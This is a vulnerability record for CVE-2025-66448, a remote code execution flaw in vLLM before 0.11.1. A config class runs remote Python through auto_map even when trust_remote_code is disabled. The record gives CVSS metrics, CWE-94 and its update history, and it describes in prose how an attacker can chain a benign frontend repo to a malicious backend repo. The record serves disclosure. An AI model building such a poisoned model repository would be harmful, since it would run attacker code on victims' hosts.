vLLM is an inference and serving engine for large language models (LLMs). Prior to 0.11.1, vllm has a critical remote code execution vector in a config class named Nemotron_Nano_VL_Config. When vllm loads a model config that contains an auto_map entry, the config class resolves that mapping with get_class_from_dynamic_module(...) and immediately instantiates the returned class. This fetches and executes Python from the remote repository referenced in the auto_map string. Crucially, this happens even when the caller explicitly sets trust_remote_code=False in vllm.transformers_utils.config.get_config. In practice, an attacker can publish a benign-looking frontend repo whose config.json points via auto_map to a separate malicious backend repo; loading the frontend will silently run the backend’s code on the victim host. This vulnerability is fixed in 0.11.1.
Advisories

No advisories yet.

Fixes

Solution

No solution given by the vendor.


Workaround

No workaround given by the vendor.

History

Tue, 02 Dec 2025 12:30:00 +0000

Type Values Removed Values Added
First Time appeared Vllm-project
Vllm-project vllm
Vendors & Products Vllm-project
Vllm-project vllm

Mon, 01 Dec 2025 23:00:00 +0000

Type Values Removed Values Added
Description vLLM is an inference and serving engine for large language models (LLMs). Prior to 0.11.1, vllm has a critical remote code execution vector in a config class named Nemotron_Nano_VL_Config. When vllm loads a model config that contains an auto_map entry, the config class resolves that mapping with get_class_from_dynamic_module(...) and immediately instantiates the returned class. This fetches and executes Python from the remote repository referenced in the auto_map string. Crucially, this happens even when the caller explicitly sets trust_remote_code=False in vllm.transformers_utils.config.get_config. In practice, an attacker can publish a benign-looking frontend repo whose config.json points via auto_map to a separate malicious backend repo; loading the frontend will silently run the backend’s code on the victim host. This vulnerability is fixed in 0.11.1.
Title vLLM vulnerable to remote code execution via transformers_utils/get_config
Weaknesses CWE-94
References
Metrics cvssV3_1

{'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H'}


cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2025-12-02T14:14:58.324Z

Reserved: 2025-12-01T18:22:06.865Z

Link: CVE-2025-66448

cve-icon Vulnrichment

No data.

cve-icon NVD

Status : Received

Published: 2025-12-01T23:15:54.213

Modified: 2025-12-01T23:15:54.213

Link: CVE-2025-66448

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2025-12-02T11:58:51Z